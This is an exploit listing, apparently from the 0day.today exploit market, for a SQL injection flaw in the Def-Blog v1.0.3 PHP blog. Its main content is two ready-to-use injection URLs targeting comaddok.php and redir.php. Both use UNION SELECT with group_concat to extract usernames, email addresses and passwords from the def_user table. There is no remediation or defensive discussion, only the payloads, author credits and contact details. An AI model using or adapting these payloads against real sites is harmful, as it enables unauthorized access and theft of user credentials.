[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Def-Blog v1.0.3 sql injection vulnerability

Author
Cyber-Crystal
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17446
Category
web applications
Date add
27-01-2012
Platform
php
+-------------------------------------------------------------------------+
# Exploit Title : Def-Blog v1.0.3 sql injection Vulnerability
# version       : V 1.0.3  and V 1.0.2                                                                           
# Author        : Cyber-Crystal                                             
# Date          : n/a  
# Software Link : http://www.easy-script.com/scripts-PHP/def-blog-v103-1981.html                                                                                
+-------------------------------------------------------------------------+


[+] Exploits

http://localhost:8080/blog/comaddok.php?article=-1+union+select+1,group_concat%28pseudo,0x3e,mail,0x3e,mdp%29+from+def_user%20--
http://localhost:8080/blog/redir.php?id=-2+UnioN+Select+1,2,group_concat%28pseudo,0x3e,mail,0x3e,mdp%29+from+def_user%20--


############################
# Greetz 2 : All man       #
# home : v4-team.com       #
# Cyb3r.Crystal@Gmail.com  #
# The End /////////////////#



#  0day.today [2024-12-24]  #